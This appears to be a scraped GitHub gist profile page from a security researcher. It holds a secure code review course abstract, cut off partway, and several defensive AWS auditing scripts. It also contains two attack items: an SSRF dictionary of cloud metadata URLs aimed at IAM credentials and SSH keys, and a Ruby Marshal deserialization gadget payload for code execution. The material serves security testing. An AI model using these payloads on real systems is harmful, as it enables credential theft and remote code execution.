Ken Johnson cktricky


Course Abstract:

Ready to take your bug hunting to a deeper level? Ever been tasked with reviewing actual source code for SQL Injection, XSS, Access Control and other security flaws? Does the idea of reviewing this code leave you with heartburn? This course introduces a proven methodology and framework for performing a secure code review, and addresses common challenges in modern secure code review. Short-circuit the work of developing your own secure code review techniques by learning from Seth & Ken's past adventures in performing hundreds of code reviews and the lessons we've learned along the way. We will share a proven methodology to perform security analysis of any source code repository and suss out security flaws, no matter the size of the code base, the framework, or the language.

Course Objectives:

This course introduces security professionals and software developers to the nitty-gritty details of performing a code review. Specifically, the course will impart the following to attendees:

  • Code Revi
@cktricky
cktricky / cloud_metadata.txt
Created October 18, 2018 04:34 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@cktricky
cktricky / list_monitoring_configuration.py
Created January 30, 2017 00:58
List Configuration of Monitoring Services in AWS
import boto3
import pprint
pp = pprint.PrettyPrinter(indent=5, width=80, compact=False)
#http://docs.aws.amazon.com/general/latest/gr/rande.html
regions = ['us-east-1', 'us-west-2', 'ap-northeast-2', 'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1', 'eu-central-1', 'eu-west-1']
'''
@cktricky
cktricky / review_s3_buckets.py
Created January 25, 2017 17:11
Review S3 Bucket Policies
import boto3
import pprint
# MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK.
access_key_id = 'replace me'
secret_access_key = 'replace me'
'''
WORK IN PROGRESS, NOT COMPLETED
This file is used to review s3 bucket permissions and whether or not they are encrypted
@cktricky
cktricky / review_encrypted_volumes.py
Created January 25, 2017 17:08
Evaluate EBS Volumes Encryption Status
import boto3
import pprint
# MAKE SURE YOU CHANGE THESE VALUES OR THE TOOL WON'T WORK.
access_key_id = 'replace me'
secret_access_key = 'replace me'
'''
This file is used to list EBS volumes and whether or not they are encrypted. This is only for "in-use" (running) volumes.
@cktricky
cktricky / gist:8f4e9912f757d1ccdcd00ad8e8630620
Created January 12, 2017 04:13
Lambda Function to Alert (Slack) of Unauthorized IAM Attempt
var AWS = require('aws-sdk');
var url = require('url');
var https = require('https');
var hookUrl, kmsEncyptedHookUrl, slackChannel;
kmsEncyptedHookUrl = 'abcd1234'; // Enter the base-64 encoded, encrypted key (CiphertextBlob)
slackChannel = 'example_channel'; // Enter the Slack channel to send a message to
var postMessage = function(message, callback) {
@cktricky
cktricky / list_aws_user_policies.py
Created November 3, 2016 01:38
List User Policies in AWS
import boto3
from itertools import chain
import csv
'''
Goal)
Create a matrix (csv) that consists of (and is used in an excel file capacity):
*** List out each policy (Managed and Inline) that are attached to a user.
#!/usr/bin/env ruby
require 'aws-sdk'
sts = Aws::STS::Client.new(
region: 'us-east-1',
access_key_id: "<insert access key id>",
secret_access_key: "<secret>"
)
@cktricky
cktricky / funny
Last active August 29, 2015 14:23
Benny's Song "Satisfaction"
say 'push me, and then just touch me, so I can get my, satisfaction' && \
say -v victoria 'push me, and then just touch me, so I can get my, satisfaction' && \
say -v victoria 'satisfaction' &&\
say 'boing, boom tschak,,,boing, boom tschak'
def test
code = "eval('puts \"hello\"')"
return Base64.encode64 "\x04\x08" +
"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
":\x0E@instance" +
"o"+":\x08ERB"+"\x06" +
":\x09@src" +
Marshal.dump(code)[2..-1] +
":\x0C@method"+":\x0Bresult"
end